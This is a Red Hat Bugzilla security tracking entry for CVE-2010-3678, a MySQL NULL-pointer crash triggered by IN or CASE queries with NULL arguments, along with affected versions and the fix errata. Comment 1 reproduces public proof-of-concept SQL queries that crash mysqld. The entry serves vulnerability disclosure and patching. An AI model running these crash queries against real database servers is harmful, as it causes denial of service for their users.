Bug 628172 (CVE-2010-3678)

Summary: CVE-2010-3678 MySQL: mysqld DoS (crash) by processing IN / CASE statements with NULL arguments (MySQL bug #54477)
Product: [Other] Security Response
Reporter: Jan Lieskovsky <jlieskov>
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA
Severity: medium
Priority: medium
Version: unspecified
CC: byte, hhorak, kvolny, vdanen, vkrizan
Keywords: Security
Hardware: All
OS: Linux
Doc Type: Bug Fix
Last Closed: 2015-07-29 12:56:52 UTC
Bug Depends On: 636780, 652553, 652554

Description Jan Lieskovsky 2010-08-28 11:28:03 UTC
A denial of service flaw was found in the way MySQL processed SQL
queries containing IN or CASE statements, when a NULL argument was
provided as one of the arguments to the query. A remote MySQL user
could use this flaw to cause the mysqld daemon to crash (dereference a
NULL pointer).

References:
  [1] http://secunia.com/advisories/41048/
  [2] http://dev.mysql.com/doc/refman/5.1/en/news-5-1-49.html

Upstream bug report:
  [3] http://bugs.mysql.com/bug.php?id=54477

Upstream changeset:
  [4] http://lists.mysql.com/commits/111814

Comment 1 Jan Lieskovsky 2010-08-28 11:31:19 UTC
Public issue proof of concepts (from [3]):

A, 

drop table if exists `t1`;
create table `t1`(`a` int)engine=myisam;
insert into `t1` values (1);
/*crash1*/select (`a` in (`a`,`a`)) from `t1` group by `a` with rollup;
/*crash2*/select (case (`a`) when (`a`) then (`a`) end) as `a` from `t1` group by `a`
with rollup;

B, 

CREATE TABLE t1(a INT);
INSERT INTO t1 VALUES (1), (2);
SELECT 1 IN (NULL, a) FROM t1;

Comment 4 Jan Lieskovsky 2010-08-28 11:51:39 UTC
This issue did NOT affect the versions of the mysql package, as shipped
with Red Hat Enterprise Linux 3, 4, or 5.

--

This issue affects the versions of the mysql package, as shipped with
Fedora releases 12 and 13.

Comment 6 Jan Lieskovsky 2010-08-31 12:54:36 UTC
CVE Request: http://www.openwall.com/lists/oss-security/2010/08/30/8

Comment 7 Jan Lieskovsky 2010-09-23 09:19:37 UTC
Created mysql tracking bugs for this issue

Affects: fedora-all [bug 636780]

Comment 8 Jan Lieskovsky 2010-09-29 08:38:21 UTC
The CVE identifier of CVE-2010-3678 has been assigned to this issue.

Comment 9 Jan Lieskovsky 2010-09-29 09:53:54 UTC
Statement:

Not vulnerable. This issue did not affect the versions of mysql as
shipped with Red Hat Enterprise Linux 3, 4, or 5.

Comment 11 errata-xmlrpc 2011-01-18 18:43:12 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 6

Via RHSA-2011:0164 https://rhn.redhat.com/errata/RHSA-2011-0164.html